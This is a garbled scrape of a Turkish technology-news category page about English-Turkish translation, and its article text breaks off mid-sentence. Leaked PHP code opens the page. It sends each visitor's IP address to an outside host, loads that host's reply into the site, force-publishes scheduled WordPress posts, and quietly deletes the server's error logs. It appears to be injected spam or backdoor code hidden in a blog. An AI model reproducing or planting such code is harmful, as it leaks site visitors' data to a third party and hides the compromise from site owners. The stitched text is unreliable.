$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> cümle çeviri | Teknoloji Haberleri

cümle çeviri kategorisindeki tüm yazılar

Son Yazılar

İngilizce Türkçe Çeviri İşleminin Günümüzdeki Hali

Günümüzde çeviri alanında ihtiyaçları bulunan pek çok kişinin bulunduğunu söyleyebiliriz. Özellikle de öğrencilerin bu aşamada büyük ihtiyaçları bulunduğunun altını çizelim. Peki bu alandaki ihtiyaçlar nasıl gideriliyor? Günümüzde halen sözlük üzerinden kelime anlamlarının bulunması ile çeviri işlemi yapan insanların sayısı hiç de azımsanacak derecede değildir. Bu yanlış bir